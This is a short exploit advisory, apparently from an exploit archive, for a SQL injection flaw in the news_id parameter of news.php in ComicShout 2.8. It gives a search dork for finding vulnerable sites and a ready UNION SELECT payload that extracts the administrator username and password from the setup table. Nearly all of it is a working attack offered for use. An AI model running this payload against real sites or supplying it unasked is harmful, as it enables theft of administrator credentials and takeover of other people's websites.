id: 3099
date: 05/31/2008
title: ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability
author: JosS
cves: 

=============================================================
ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability
=============================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.


[~] Software: ComicShout 2.8
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*



#  0day.today [2023-03-24]  #